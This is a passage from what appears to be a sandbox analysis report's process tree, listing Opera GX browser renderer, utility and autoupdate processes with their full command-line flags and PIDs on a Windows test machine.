--ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=6044,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6056 /prefetch:22⤵PID:5276
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=6288,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:22⤵PID:7552
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=6308,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6480 /prefetch:22⤵PID:1880
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6720,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:12⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" --pipeid=oauc_pipebbf75761f34e48ef16427d916ed763c82⤵PID:5244
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x230,0x234,0x238,0x68,0x23c,0x7ff60529f8f4,0x7ff60529f900,0x7ff60529f9103⤵PID:8448
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5208,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:82⤵PID:8540
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5980,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:8664
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6740,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6996 /prefetch:82⤵PID:8980
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=7112,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7020 /prefetch:12⤵PID:9252
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5724,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5976 /prefetch:12⤵PID:9404
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=7484,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:22⤵PID:9648
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5292,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5728 /prefetch:12⤵PID:9920
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6332,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6280 /prefetch:12⤵
- Checks computer location settings
PID:8612
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8080,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8000 /prefetch:82⤵PID:9860
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7720,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7668 /prefetch:12⤵PID:10924
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7736,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:12⤵PID:6664
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7860,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8160 /prefetch:12⤵PID:7400
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off 